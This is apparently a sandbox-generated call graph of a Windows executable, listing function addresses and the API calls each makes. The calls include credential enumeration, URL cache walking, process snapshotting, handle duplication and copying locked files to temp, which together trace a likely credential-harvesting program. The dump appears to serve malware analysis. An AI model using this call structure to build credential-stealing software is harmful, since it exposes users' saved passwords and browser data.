API calls 38590->38618 38592 44490c 38619 44474a 8 API calls 38592->38619 38594 444921 38620 44474a 8 API calls 38594->38620 38596 444936 38621 44474a 8 API calls 38596->38621 38598 44494b 38622 44474a 8 API calls 38598->38622 38600 444960 ??3@YAXPAX 38600->38576 38602 44db70 38601->38602 38603 40d702 memset GetPrivateProfileStringW 38602->38603 38604 40d752 38603->38604 38605 40d75c WritePrivateProfileStringW 38603->38605 38604->38605 38606 40d758 
38604->38606 38605->38606 38606->38563 38608 44db70 38607->38608 38609 40da8d memset 38608->38609 38610 40daac LoadStringW 38609->38610 38611 40dac6 38610->38611 38611->38610 38613 40dade 38611->38613 38623 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38611->38623 38613->38403 38614->38584 38615->38586 38616->38588 38617->38590 38618->38592 38619->38594 38620->38596 38621->38598 38622->38600 38623->38611 38634 409b98 GetFileAttributesW 38624->38634 38626 40daea 38627 40db63 38626->38627 38628 40daef wcscpy wcscpy GetPrivateProfileIntW 38626->38628 38627->38405 38635 40d65d GetPrivateProfileStringW 38628->38635 38630 40db3e 38636 40d65d GetPrivateProfileStringW 38630->38636 38632 40db4f 38637 40d65d GetPrivateProfileStringW 38632->38637 38634->38626 38635->38630 38636->38632 38637->38627 38673 40eaff 38638->38673 38642 411ae2 memset 38641->38642 38643 411b8f 38641->38643 38714 409bca GetModuleFileNameW 38642->38714 38655 411a8b 38643->38655 38645 411b0a wcsrchr 38646 411b22 wcscat 38645->38646 38647 411b1f 38645->38647 38715 414770 wcscpy wcscpy wcscpy CloseHandle 38646->38715 38647->38646 38649 411b67 38716 402afb 38649->38716 38653 411b7f 38772 40ea13 SendMessageW memset SendMessageW 38653->38772 38656 402afb 27 API calls 38655->38656 38657 411ac0 38656->38657 38658 4110dc 38657->38658 38659 41113e 38658->38659 38664 4110f0 38658->38664 38797 40969c LoadCursorW SetCursor 38659->38797 38661 411143 38798 4032b4 38661->38798 38816 444a54 38661->38816 38662 4110f7 _wcsicmp 38662->38664 38663 411157 38665 40ada2 _wcsicmp 38663->38665 38664->38659 38664->38662 38819 410c46 10 API calls 38664->38819 38668 411167 38665->38668 38666 4111af 38668->38666 38669 4111a6 qsort 38668->38669 38669->38666 38672->38487 38674 40eb10 38673->38674 38687 40e8e0 38674->38687 38677 40eb6c memcpy memcpy 38678 40ebe1 38677->38678 38685 40ebb7 38677->38685 38678->38677 38680 40ebf2 ??2@YAPAXI ??2@YAPAXI 38678->38680 38679 40d134 16 API calls 38679->38685 
38681 40ec2e ??2@YAPAXI 38680->38681 38683 40ec65 38680->38683 38681->38683 38683->38683 38697 40ea7f 38683->38697 38685->38678 38685->38679 38686 402f49 38686->38487 38688 40e8f2 38687->38688 38689 40e8eb ??3@YAXPAX 38687->38689 38690 40e900 38688->38690 38691 40e8f9 ??3@YAXPAX 38688->38691 38689->38688 38692 40e90a ??3@YAXPAX 38690->38692 38694 40e911 38690->38694 38691->38690 38692->38694 38693 40e931 ??2@YAPAXI ??2@YAPAXI 38693->38677 38694->38693 38695 40e921 ??3@YAXPAX 38694->38695 38696 40e92a ??3@YAXPAX 38694->38696 38695->38696 38696->38693 38698 40aa04 free 38697->38698 38699 40ea88 38698->38699 38700 40aa04 free 38699->38700 38701 40ea90 38700->38701 38702 40aa04 free 38701->38702 38703 40ea98 38702->38703 38704 40aa04 free 38703->38704 38705 40eaa0 38704->38705 38706 40a9ce 4 API calls 38705->38706 38707 40eab3 38706->38707 38708 40a9ce 4 API calls 38707->38708 38709 40eabd 38708->38709 38710 40a9ce 4 API calls 38709->38710 38711 40eac7 38710->38711 38712 40a9ce 4 API calls 38711->38712 38713 40ead1 38712->38713 38713->38686 38714->38645 38715->38649 38773 40b2cc 38716->38773 38718 402b0a 38719 40b2cc 27 API calls 38718->38719 38720 402b23 38719->38720 38721 40b2cc 27 API calls 38720->38721 38722 402b3a 38721->38722 38723 40b2cc 27 API calls 38722->38723 38724 402b54 38723->38724 38725 40b2cc 27 API calls 38724->38725 38726 402b6b 38725->38726 38727 40b2cc 27 API calls 38726->38727 38728 402b82 38727->38728 38729 40b2cc 27 API calls 38728->38729 38730 402b99 38729->38730 38731 40b2cc 27 API calls 38730->38731 38732 402bb0 38731->38732 38733 40b2cc 27 API calls 38732->38733 38734 402bc7 38733->38734 38735 40b2cc 27 API calls 38734->38735 38736 402bde 38735->38736 38737 40b2cc 27 API calls 38736->38737 38738 402bf5 38737->38738 38739 40b2cc 27 API calls 38738->38739 38740 402c0c 38739->38740 38741 40b2cc 27 API calls 38740->38741 38742 402c23 38741->38742 38743 40b2cc 27 API calls 38742->38743 38744 402c3a 38743->38744 38745 40b2cc 27 API calls 
38744->38745 38746 402c51 38745->38746 38747 40b2cc 27 API calls 38746->38747 38748 402c68 38747->38748 38749 40b2cc 27 API calls 38748->38749 38750 402c7f 38749->38750 38751 40b2cc 27 API calls 38750->38751 38752 402c99 38751->38752 38753 40b2cc 27 API calls 38752->38753 38754 402cb3 38753->38754 38755 40b2cc 27 API calls 38754->38755 38756 402cd5 38755->38756 38757 40b2cc 27 API calls 38756->38757 38758 402cf0 38757->38758 38759 40b2cc 27 API calls 38758->38759 38760 402d0b 38759->38760 38761 40b2cc 27 API calls 38760->38761 38762 402d26 38761->38762 38763 40b2cc 27 API calls 38762->38763 38764 402d3e 38763->38764 38765 40b2cc 27 API calls 38764->38765 38766 402d59 38765->38766 38767 40b2cc 27 API calls 38766->38767 38768 402d78 38767->38768 38769 40b2cc 27 API calls 38768->38769 38770 402d93 38769->38770 38771 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38770->38771 38771->38653 38772->38643 38776 40b58d 38773->38776 38775 40b2d1 38775->38718 38777 40b5a4 GetModuleHandleW FindResourceW 38776->38777 38778 40b62e 38776->38778 38779 40b5c2 LoadResource 38777->38779 38781 40b5e7 38777->38781 38778->38775 38780 40b5d0 SizeofResource LockResource 38779->38780 38779->38781 38780->38781 38781->38778 38789 40afcf 38781->38789 38783 40b608 memcpy 38792 40b4d3 memcpy 38783->38792 38785 40b61e 38793 40b3c1 18 API calls 38785->38793 38787 40b626 38794 40b04b 38787->38794 38790 40b04b ??3@YAXPAX 38789->38790 38791 40afd7 ??2@YAPAXI 38790->38791 38791->38783 38792->38785 38793->38787 38795 40b051 ??3@YAXPAX 38794->38795 38796 40b05f 38794->38796 38795->38796 38796->38778 38797->38661 38799 4032c4 38798->38799 38800 40b633 free 38799->38800 38801 403316 38800->38801 38820 44553b 38801->38820 38805 403480 39018 40368c 15 API calls 38805->39018 38807 403489 38808 40b633 free 38807->38808 38810 403495 38808->38810 38809 40333c 38809->38805 38811 4033a9 memset memcpy 38809->38811 38812 4033ec wcscmp 38809->38812 39016 4028e7 11 API calls 
38809->39016 39017 40f508 6 API calls 38809->39017 38810->38663 38811->38809 38811->38812 38812->38809 38815 403421 _wcsicmp 38815->38809 38817 444a64 FreeLibrary 38816->38817 38818 444a83 38816->38818 38817->38818 38818->38663 38819->38664 38821 445548 38820->38821 38822 445599 38821->38822 39019 40c768 38821->39019 38823 4455a8 memset 38822->38823 38831 4457f2 38822->38831 39102 403988 38823->39102 38829 4455e5 38838 445672 38829->38838 38853 44560f 38829->38853 38876 445854 38831->38876 39205 403e2d memset memset memset memset memset 38831->39205 38832 4458bb memset memset 38835 414c2e 15 API calls 38832->38835 38834 44595e memset memset 38841 414c2e 15 API calls 38834->38841 38842 4458f9 38835->38842 38836 44557a 38843 44558c 38836->38843 39299 4136c0 CoTaskMemFree 38836->39299 39113 403fbe memset memset memset memset memset 38838->39113 38839 445a00 memset memset 39251 414c2e 38839->39251 38840 445b22 38845 445bca 38840->38845 38846 445b38 memset memset memset 38840->38846 38851 44599c 38841->38851 38852 40b2cc 27 API calls 38842->38852 39086 444b06 38843->39086 38863 445c8b memset memset 38845->38863 38917 445cf0 38845->38917 38858 445bd4 38846->38858 38859 445b98 38846->38859 38847 445849 39315 40b1ab free free 38847->39315 38862 40b2cc 27 API calls 38851->38862 38864 445909 38852->38864 38855 4087b3 337 API calls 38853->38855 38874 445621 38855->38874 38856 445585 39300 41366b FreeLibrary 38856->39300 38857 44589f 39316 40b1ab free free 38857->39316 38871 414c2e 15 API calls 38858->38871 38859->38858 38867 445ba2 38859->38867 38877 4459ac 38862->38877 38865 414c2e 15 API calls 38863->38865 38873 409d1f 6 API calls 38864->38873 38878 445cc9 38865->38878 39386 4099c6 wcslen 38867->39386 38868 4456b2 39303 40b1ab free free 38868->39303 38870 40b2cc 27 API calls 38882 445a4f 38870->38882 38884 445be2 38871->38884 38872 403335 39015 4452e5 45 API calls 38872->39015 38887 445919 38873->38887 39301 4454bf 20 API calls 38874->39301 38875 445823 38875->38847 38895 
4087b3 337 API calls 38875->38895 38881 4458aa 38876->38881 39228 403c9c memset memset memset memset memset 38876->39228 38888 409d1f 6 API calls 38877->38888 38889 409d1f 6 API calls 38878->38889 38879 445879 38879->38857 38899 4087b3 337 API calls 38879->38899 38881->38832 38914 44594a 38881->38914 39265 409d1f wcslen wcslen 38882->39265 38893 40b2cc 27 API calls 38884->38893 38885 445d3d 38913 40b2cc 27 API calls 38885->38913 38886 445d88 memset memset memset 38896 414c2e 15 API calls 38886->38896 39317 409b98 GetFileAttributesW 38887->39317 38897 4459bc 38888->38897 38898 445ce1 38889->38898 38890 445bb3 39389 445403 memset 38890->39389 38891 445680 38891->38868 39136 4087b3 memset 38891->39136 38902 445bf3 38893->38902 38895->38875 38905 445dde 38896->38905 39382 409b98 GetFileAttributesW 38897->39382 39406 409b98 GetFileAttributesW 38898->39406 38899->38879 38912 409d1f 6 API calls 38902->38912 38903 445928 38903->38914 39318 40b6ef 38903->39318 38915 40b2cc 27 API calls 38905->38915 38907 4459cb 38916 4459ed 38907->38916 38926 40b6ef 249 API calls 38907->38926 38911 40b2cc 27 API calls 38919 445a94 38911->38919 38921 445c07 38912->38921 38922 445d54 _wcsicmp 38913->38922 38914->38834 38914->38916 38925 445def 38915->38925 38916->38839 38916->38840 38917->38872 38917->38885 38917->38886 38918 445389 255 API calls 38918->38845 39270 40ae18 38919->39270 38920 44566d 38920->38831 39187 413d4c 38920->39187 38929 445389 255 API calls 38921->38929 38930 445d71 38922->38930 38992 445d67 38922->38992 38924 445665 39302 40b1ab free free 38924->39302 38931 409d1f 6 API calls 38925->38931 38926->38916 38934 445c17 38929->38934 39407 445093 23 API calls 38930->39407 38937 445e03 38931->38937 38933 4456d8 38939 40b2cc 27 API calls 38933->38939 38940 40b2cc 27 API calls 38934->38940 38936 44563c 38936->38924 38942 4087b3 337 API calls 38936->38942 39408 409b98 GetFileAttributesW 38937->39408 38938 40b6ef 249 API calls 38938->38872 38944 4456e2 38939->38944 38945 445c23 
38940->38945 38941 445d83 38941->38872 38942->38936 39304 413fa6 _wcsicmp _wcsicmp 38944->39304 38949 409d1f 6 API calls 38945->38949 38947 445e12 38950 445e6b 38947->38950 38954 40b2cc 27 API calls 38947->38954 38952 445c37 38949->38952 39410 445093 23 API calls 38950->39410 38951 4456eb 38957 4456fd memset memset memset memset 38951->38957 38958 4457ea 38951->38958 38959 445389 255 API calls 38952->38959 38953 445b17 39383 40aebe 38953->39383 38961 445e33 38954->38961 39305 409c70 wcscpy wcsrchr 38957->39305 39308 413d29 38958->39308 38965 445c47 38959->38965 38966 409d1f 6 API calls 38961->38966 38963 445e7e 38967 445f67 38963->38967 38970 40b2cc 27 API calls 38965->38970 38971 445e47 38966->38971 38972 40b2cc 27 API calls 38967->38972 38968 445ab2 memset 38973 40b2cc 27 API calls 38968->38973 38975 445c53 38970->38975 39409 409b98 GetFileAttributesW 38971->39409 38977 445f73 38972->38977 38978 445aa1 38973->38978 38974 409c70 2 API calls 38979 44577e 38974->38979 38980 409d1f 6 API calls 38975->38980 38982 409d1f 6 API calls 38977->38982 38978->38953 38978->38968 38983 409d1f 6 API calls 38978->38983 39277 40add4 38978->39277 39282 445389 38978->39282 39291 40ae51 38978->39291 38984 409c70 2 API calls 38979->38984 38985 445c67 38980->38985 38981 445e56 38981->38950 38989 445e83 memset 38981->38989 38986 445f87 38982->38986 38983->38978 38987 44578d 38984->38987 38988 445389 255 API calls 38985->38988 39413 409b98 GetFileAttributesW 38986->39413 38987->38958 38994 40b2cc 27 API calls 38987->38994 38988->38845 38993 40b2cc 27 API calls 38989->38993 38992->38872 38992->38938 38995 445eab 38993->38995 38996 4457a8 38994->38996 38997 409d1f 6 API calls 38995->38997 38998 409d1f 6 API calls 38996->38998 39000 445ebf 38997->39000 38999 4457b8 38998->38999 39307 409b98 GetFileAttributesW 38999->39307 39002 40ae18 9 API calls 39000->39002 39011 445ef5 39002->39011 39003 4457c7 39003->38958 39005 4087b3 337 API calls 39003->39005 39004 40ae51 9 API calls 39004->39011 
39005->38958 39006 445f5c 39007 40aebe FindClose 39006->39007 39007->38967 39008 40add4 2 API calls 39008->39011 39009 40b2cc 27 API calls 39009->39011 39010 409d1f 6 API calls 39010->39011 39011->39004 39011->39006 39011->39008 39011->39009 39011->39010 39013 445f3a 39011->39013 39411 409b98 GetFileAttributesW 39011->39411 39412 445093 23 API calls 39013->39412 39015->38809 39016->38815 39017->38809 39018->38807 39020 40c775 39019->39020 39414 40b1ab free free 39020->39414 39022 40c788 39415 40b1ab free free 39022->39415 39024 40c790 39416 40b1ab free free 39024->39416 39026 40c798 39027 40aa04 free 39026->39027 39028 40c7a0 39027->39028 39417 40c274 memset 39028->39417 39033 40a8ab 9 API calls 39034 40c7c3 39033->39034 39035 40a8ab 9 API calls 39034->39035 39036 40c7d0 39035->39036 39446 40c3c3 39036->39446 39040 40c7e5 39041 40c877 39040->39041 39042 40c86c 39040->39042 39469 40a706 wcslen memcpy 39040->39469 39471 40c634 49 API calls 39040->39471 39049 40bdb0 39041->39049 39472 4053fe 39 API calls 39042->39472 39045 40c813 _wcslwr 39470 40c634 49 API calls 39045->39470 39047 40c829 wcslen 39047->39040 39724 404363 39049->39724 39052 40bf5d 39744 40440c 39052->39744 39054 40bdee 39054->39052 39057 40b2cc 27 API calls 39054->39057 39055 40bddf CredEnumerateW 39055->39054 39058 40be02 wcslen 39057->39058 39058->39052 39059 40be1e 39058->39059 39059->39052 39060 40be26 wcsncmp 39059->39060 39063 40be7d memset 39059->39063 39064 40bea7 memcpy 39059->39064 39065 40bf11 wcschr 39059->39065 39066 40b2cc 27 API calls 39059->39066 39068 40bf43 LocalFree 39059->39068 39747 40bd5d 28 API calls 39059->39747 39748 404423 39059->39748 39060->39059 39063->39059 39063->39064 39064->39059 39064->39065 39065->39059 39067 40bef6 _wcsnicmp 39066->39067 39067->39059 39067->39065 39068->39059 39069 4135f7 39761 4135e0 39069->39761 39072 40b2cc 27 API calls 39073 41360d 39072->39073 39074 40a804 8 API calls 39073->39074 39075 413613 39074->39075 39076 41361b 39075->39076 39077 41363e 
39075->39077 39078 40b273 27 API calls 39076->39078 39079 4135e0 FreeLibrary 39077->39079 39080 413625 GetProcAddress 39078->39080 39081 413643 39079->39081 39080->39077 39082 413648 39080->39082 39081->38836 39083 413658 39082->39083 39084 4135e0 FreeLibrary 39082->39084 39083->38836 39085 413666 39084->39085 39085->38836 39764 4449b9 39086->39764 39089 444c1f 39089->38822 39090 4449b9 42 API calls 39092 444b4b 39090->39092 39091 444c15 39094 4449b9 42 API calls 39091->39094 39092->39091 39785 444972 GetVersionExW 39092->39785 39094->39089 39095 444b99 memcmp 39100 444b8c 39095->39100 39096 444c0b 39789 444a85 42 API calls 39096->39789 39100->39095 39100->39096 39786 444aa5 42 API calls 39100->39786 39787 40a7a0 GetVersionExW 39100->39787 39788 444a85 42 API calls 39100->39788 39103 40399d 39102->39103 39790 403a16 39103->39790 39105 403a09 39804 40b1ab free free 39105->39804 39107 4039a3 39107->39105 39111 4039f4 39107->39111 39801 40a02c CreateFileW 39107->39801 39108 403a12 wcsrchr 39108->38829 39111->39105 39112 4099c6 2 API calls 39111->39112 39112->39105 39114 414c2e 15 API calls 39113->39114 39115 404048 39114->39115 39116 414c2e 15 API calls 39115->39116 39117 404056 39116->39117 39118 409d1f 6 API calls 39117->39118 39119 404073 39118->39119 39120 409d1f 6 API calls 39119->39120 39121 40408e 39120->39121 39122 409d1f 6 API calls 39121->39122 39123 4040a6 39122->39123 39124 403af5 20 API calls 39123->39124 39125 4040ba 39124->39125 39126 403af5 20 API calls 39125->39126 39127 4040cb 39126->39127 39831 40414f memset 39127->39831 39129 404140 39845 40b1ab free free 39129->39845 39131 4040ec memset 39134 4040e0 39131->39134 39132 404148 39132->38891 39133 4099c6 2 API calls 39133->39134 39134->39129 39134->39131 39134->39133 39135 40a8ab 9 API calls 39134->39135 39135->39134 39858 40a6e6 WideCharToMultiByte 39136->39858 39138 4087ed 39859 4095d9 memset 39138->39859 39141 408809 memset memset memset memset memset 39142 40b2cc 27 API calls 39141->39142 39143 
4088a1 39142->39143 39144 409d1f 6 API calls 39143->39144 39145 4088b1 39144->39145 39146 40b2cc 27 API calls 39145->39146 39147 4088c0 39146->39147 39148 409d1f 6 API calls 39147->39148 39149 4088d0 39148->39149 39150 40b2cc 27 API calls 39149->39150 39151 4088df 39150->39151 39152 409d1f 6 API calls 39151->39152 39153 4088ef 39152->39153 39154 40b2cc 27 API calls 39153->39154 39155 4088fe 39154->39155 39156 409d1f 6 API calls 39155->39156 39157 40890e 39156->39157 39158 40b2cc 27 API calls 39157->39158 39159 40891d 39158->39159 39160 409d1f 6 API calls 39159->39160 39161 40892d 39160->39161 39878 409b98 GetFileAttributesW 39161->39878 39163 40893e 39164 408943 39163->39164 39165 408958 39163->39165 39879 407fdf 75 API calls 39164->39879 39880 409b98 GetFileAttributesW 39165->39880 39169 408953 39169->38891 39188 40b633 free 39187->39188 39189 413d65 CreateToolhelp32Snapshot memset Process32FirstW 39188->39189 39190 413f00 Process32NextW 39189->39190 39191 413da5 OpenProcess 39190->39191 39192 413f17 CloseHandle 39190->39192 39193 413df3 memset 39191->39193 39197 413eb0 39191->39197 39192->38933 40103 413f27 39193->40103 39195 413ec8 39195->39197 40130 4099f4 malloc memcpy free 39195->40130 39196 413ebf free 39196->39197 39197->39190 39197->39195 39197->39196 39200 413e37 GetModuleHandleW 39201 413e1f 39200->39201 39202 413e46 GetProcAddress 39200->39202 39201->39200 40108 413959 39201->40108 40124 413ca4 39201->40124 39202->39201 39204 413ea2 CloseHandle 39204->39197 39206 414c2e 15 API calls 39205->39206 39207 403eb7 39206->39207 39208 414c2e 15 API calls 39207->39208 39209 403ec5 39208->39209 39210 409d1f 6 API calls 39209->39210 39211 403ee2 39210->39211 39212 409d1f 6 API calls 39211->39212 39213 403efd 39212->39213 39214 409d1f 6 API calls 39213->39214 39215 403f15 39214->39215 39216 403af5 20 API calls 39215->39216 39217 403f29 39216->39217 39218 403af5 20 API calls 39217->39218 39219 403f3a 39218->39219 39220 40414f 33 API calls 39219->39220 39224 403f4f 
39220->39224 39221 403faf 40139 40b1ab free free 39221->40139 39222 403f5b memset 39222->39224 39224->39221 39224->39222 39226 4099c6 2 API calls 39224->39226 39227 40a8ab 9 API calls 39224->39227 39225 403fb7 39225->38875 39226->39224 39227->39224 39229 414c2e 15 API calls 39228->39229 39230 403d26 39229->39230 39231 414c2e 15 API calls 39230->39231 39232 403d34 39231->39232 39233 409d1f 6 API calls 39232->39233 39234 403d51 39233->39234 39235 409d1f 6 API calls 39234->39235 39236 403d6c 39235->39236 39237 409d1f 6 API calls 39236->39237 39238 403d84 39237->39238 39239 403af5 20 API calls 39238->39239 39240 403d98 39239->39240 39241 403af5 20 API calls 39240->39241 39242 403da9 39241->39242 39243 40414f 33 API calls 39242->39243 39244 403dbe 39243->39244 39245 403e1e 39244->39245 39247 403dca memset 39244->39247 39249 4099c6 2 API calls 39244->39249 39250 40a8ab 9 API calls 39244->39250 40140 40b1ab free free 39245->40140 39247->39244 39248 403e26 39248->38879 39249->39244 39250->39244 39252 414b81 9 API calls 39251->39252 39253 414c40 39252->39253 39254 414c73 memset 39253->39254 40141 409cea 39253->40141 39257 414c94 39254->39257 39260 414cf4 wcscpy 39257->39260 40144 414bb0 wcscpy 39257->40144 39258 414c64 SHGetSpecialFolderPathW 39259 414d0b 39258->39259 39259->38870 39260->39259 39262 414cd2 40145 4145ac RegQueryValueExW 39262->40145 39264 414ce9 39264->39260 39266 409d62 39265->39266 39267 409d43 wcscpy 39265->39267 39266->38911 39268 409719 2 API calls 39267->39268 39269 409d51 wcscat 39268->39269 39269->39266 39271 40aebe FindClose 39270->39271 39272 40ae21 39271->39272 39273 4099c6 2 API calls 39272->39273 39274 40ae35 39273->39274 39275 409d1f 6 API calls 39274->39275 39276 40ae49 39275->39276 39276->38978 39278 40ade0 39277->39278 39279 40ae0f 39277->39279 39278->39279 39280 40ade7 wcscmp 39278->39280 39279->38978 39280->39279 39281 40adfe wcscmp 39280->39281 39281->39279 39283 40ae18 9 API calls 39282->39283 39289 4453c4 39283->39289 39284 40ae51 9 API 
calls 39284->39289 39285 4453f3 39286 40aebe FindClose 39285->39286 39288 4453fe 39286->39288 39287 40add4 2 API calls 39287->39289 39288->38978 39289->39284 39289->39285 39289->39287 39290 445403 250 API calls 39289->39290 39290->39289 39292 40ae7b FindNextFileW 39291->39292 39293 40ae5c FindFirstFileW 39291->39293 39294 40ae94 39292->39294 39295 40ae8f 39292->39295 39293->39294 39296 409d1f 6 API calls 39294->39296 39298 40aeb6 39294->39298 39297 40aebe FindClose 39295->39297 39296->39298 39297->39294 39298->38978 39299->38856 39300->38843 39301->38936 39302->38920 39303->38920 39304->38951 39306 409c89 39305->39306 39306->38974 39307->39003 39309 413d39 39308->39309 39310 413d2f FreeLibrary 39308->39310 39311 40b633 free 39309->39311 39310->39309 39312 413d42 39311->39312 39313 40b633 free 39312->39313 39314 413d4a 39313->39314 39314->38831 39315->38876 39316->38881 39317->38903 39319 44db70 39318->39319 39320 40b6fc memset 39319->39320 39321 409c70 2 API calls 39320->39321 39322 40b732 wcsrchr 39321->39322 39323 40b743 39322->39323 39324 40b746 memset 39322->39324 39323->39324 39325 40b2cc 27 API calls 39324->39325 39326 40b76f 39325->39326 39327 409d1f 6 API calls 39326->39327 39328 40b783 39327->39328 40146 409b98 GetFileAttributesW 39328->40146 39330 40b792 39331 409c70 2 API calls 39330->39331 39344 40b7c2 39330->39344 39333 40b7a5 39331->39333 39335 40b2cc 27 API calls 39333->39335 39339 40b7b2 39335->39339 39336 40b837 CloseHandle 39338 40b83e memset 39336->39338 39337 40b817 39340 409a45 3 API calls 39337->39340 40180 40a6e6 WideCharToMultiByte 39338->40180 39342 409d1f 6 API calls 39339->39342 39346 40b827 39340->39346 39342->39344 39343 40b866 39345 444432 120 API calls 39343->39345 40147 40bb98 39344->40147 39347 40b879 39345->39347 39346->39338 39348 40bad5 39347->39348 39349 40b273 27 API calls 39347->39349 39351 40b04b ??3@YAXPAX 39348->39351 39350 40b89a 39349->39350 39352 438552 133 API calls 39350->39352 39353 40baf3 39351->39353 39354 40b8a4 
39352->39354 39353->38914 39355 40bacd 39354->39355 39357 4251c4 136 API calls 39354->39357 39356 443d90 110 API calls 39355->39356 39356->39348 39379 40b8b8 39357->39379 39358 40bac6 40190 424f26 122 API calls 39358->40190 39359 40b8bd memset 40181 425413 17 API calls 39359->40181 39362 425413 17 API calls 39362->39379 39365 40a71b MultiByteToWideChar 39365->39379 39368 40b9b5 memcmp 39368->39379 39369 4099c6 2 API calls 39369->39379 39370 404423 37 API calls 39370->39379 39372 4251c4 136 API calls 39372->39379 39373 40bb3e memset memcpy 40191 40a734 MultiByteToWideChar 39373->40191 39376 40bb88 LocalFree 39376->39379 39379->39358 39379->39359 39379->39362 39379->39365 39379->39368 39379->39369 39379->39370 39379->39372 39379->39373 39380 40ba5f memcmp 39379->39380 39381 40a734 MultiByteToWideChar 39379->39381 40182 4253ef 16 API calls 39379->40182 40183 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 39379->40183 40184 4253af 17 API calls 39379->40184 40185 4253cf 17 API calls 39379->40185 40186 447280 memset 39379->40186 40187 447960 memset memcpy memcpy memcpy 39379->40187 40188 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 39379->40188 40189 447920 memcpy memcpy memcpy 39379->40189 39380->39379 39381->39379 39382->38907 39384 40aed1 39383->39384 39385 40aec7 FindClose 39383->39385 39384->38840 39385->39384 39387 4099d7 39386->39387 39388 4099da memcpy 39386->39388 39387->39388 39388->38890 39390 40b2cc 27 API calls 39389->39390 39391 44543f 39390->39391 39392 409d1f 6 API calls 39391->39392 39393 44544f 39392->39393 40280 409b98 GetFileAttributesW 39393->40280 39395 44545e 39396 445476 39395->39396 39397 40b6ef 249 API calls 39395->39397 39398 40b2cc 27 API calls 39396->39398 39397->39396 39399 445482 39398->39399 39400 409d1f 6 API calls 39399->39400 39401 445492 39400->39401 40281 409b98 GetFileAttributesW 39401->40281 39403 4454a1 39404 4454b9 39403->39404 39405 40b6ef 249 API calls 39403->39405 39404->38918 39405->39404 39406->38917 39407->38941 39408->38947 
39409->38981 39410->38963 39411->39011 39412->39011 39413->38992 39414->39022 39415->39024 39416->39026 39418 414c2e 15 API calls 39417->39418 39419 40c2ae 39418->39419 39473 40c1d3 39419->39473 39424 40c3be 39441 40a8ab 39424->39441 39425 40afcf 2 API calls 39426 40c2fd FindFirstUrlCacheEntryW 39425->39426 39427 40c3b6 39426->39427 39428 40c31e wcschr 39426->39428 39429 40b04b ??3@YAXPAX 39427->39429 39430 40c331 39428->39430 39431 40c35e FindNextUrlCacheEntryW 39428->39431 39429->39424 39433 40a8ab 9 API calls 39430->39433 39431->39428 39432 40c373 GetLastError 39431->39432 39434 40c3ad FindCloseUrlCache 39432->39434 39435 40c37e 39432->39435 39436 40c33e wcschr 39433->39436 39434->39427 39438 40afcf 2 API calls 39435->39438 39436->39431 39437 40c34f 39436->39437 39439 40a8ab 9 API calls 39437->39439 39440 40c391 FindNextUrlCacheEntryW 39438->39440 39439->39431 39440->39428 39440->39434 39656 40a97a 39441->39656 39444 40a8cc 39444->39033 39662 40b1ab free free 39446->39662 39448 40c3dd 39449 40b2cc 27 API calls 39448->39449 39450 40c3e7 39449->39450 39451 40c50e 39450->39451 39452 40c3ff 39450->39452 39466 405337 39451->39466 39453 40a9ce 4 API calls 39452->39453 39454 40c418 memset 39453->39454 39663 40aa1d 39454->39663 39457 40c471 39459 40c47a _wcsupr 39457->39459 39458 40c505 39458->39451 39665 40a8d0 7 API calls 39459->39665 39461 40c498 39666 40a8d0 7 API calls 39461->39666 39463 40c4ac memset 39464 40aa1d 39463->39464 39465 40c4e4 RegEnumValueW 39464->39465 39465->39458 39465->39459 39667 405220 39466->39667 39469->39045 39470->39047 39471->39040 39472->39041 39474 40ae18 9 API calls 39473->39474 39480 40c210 39474->39480 39475 40ae51 9 API calls 39475->39480 39476 40c264 39477 40aebe FindClose 39476->39477 39479 40c26f 39477->39479 39478 40add4 2 API calls 39478->39480 39485 40e5ed memset memset 39479->39485 39480->39475 39480->39476 39480->39478 39481 40c231 _wcsicmp 39480->39481 39483 40c1d3 34 API calls 39480->39483 39481->39480 39482 40c248 
39481->39482 39498 40c084 21 API calls 39482->39498 39483->39480 39486 414c2e 15 API calls 39485->39486 39487 40e63f 39486->39487 39488 409d1f 6 API calls 39487->39488 39489 40e658 39488->39489 39499 409b98 GetFileAttributesW 39489->39499 39491 40e667 39492 40e680 39491->39492 39493 409d1f 6 API calls 39491->39493 39500 409b98 GetFileAttributesW 39492->39500 39493->39492 39495 40e68f 39497 40c2d8 39495->39497 39501 40e4b2 39495->39501 39497->39424 39497->39425 39498->39480 39499->39491 39500->39495 39522 40e01e 39501->39522 39503 40e593 39504 40e5b0 39503->39504 39505 40e59c DeleteFileW 39503->39505 39506 40b04b ??3@YAXPAX 39504->39506 39505->39504 39508 40e5bb 39506->39508 39507 40e521 39507->39503 39545 40e175 39507->39545 39510 40e5c4 CloseHandle 39508->39510 39511 40e5cc 39508->39511 39510->39511 39513 40b633 free 39511->39513 39512 40e573 39515 40e584 39512->39515 39516 40e57c CloseHandle 39512->39516 39514 40e5db 39513->39514 39517 40b633 free 39514->39517 39588 40b1ab free free 39515->39588 39516->39515 39519 40e5e3 39517->39519 39519->39497 39521 40e540 39521->39512 39565 40e2ab 39521->39565 39589 406214 39522->39589 39525 40e16b 39525->39507 39528 40afcf 2 API calls 39529 40e08d OpenProcess 39528->39529 39530 40e0a4 GetCurrentProcess DuplicateHandle 39529->39530 39534 40e152 39529->39534 39531 40e0d0 GetFileSize 39530->39531 39532 40e14a CloseHandle 39530->39532 39625 409a45 GetTempPathW 39531->39625 39532->39534 39533 40e160 39537 40b04b ??3@YAXPAX 39533->39537 39534->39533 39536 406214 22 API calls 39534->39536 39536->39533 39537->39525 39538 40e0ea 39628 4096dc CreateFileW 39538->39628 39540 40e0f1 CreateFileMappingW 39541 40e140 CloseHandle CloseHandle 39540->39541 39542 40e10b MapViewOfFile 39540->39542 39541->39532 39543 40e13b CloseHandle 39542->39543 39544 40e11f WriteFile UnmapViewOfFile 39542->39544 39543->39541 39544->39543 39546 40e18c 39545->39546 39629 406b90 39546->39629 39549 40e1a7 memset 39555 40e1e8 39549->39555 39550 40e299 39639 4069a3 
